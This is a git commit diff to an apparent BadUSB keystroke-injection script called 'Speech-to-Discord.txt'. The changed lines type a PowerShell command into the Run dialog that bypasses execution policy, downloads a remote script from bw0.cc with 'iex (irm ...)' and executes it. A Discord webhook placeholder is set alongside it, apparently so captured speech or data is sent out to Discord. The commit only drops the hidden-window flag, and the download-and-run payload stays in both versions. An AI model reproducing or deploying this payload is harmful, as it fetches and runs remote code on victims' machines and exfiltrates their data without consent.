Update Speech-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 11:05:28 +00:00
committed by GitHub
parent c998a52cca
commit dd41abc2b8

View File

@@ -11,7 +11,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; iex (irm bw0.cc/dcsp)
STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE' ; iex (irm bw0.cc/dcsp)
ENTER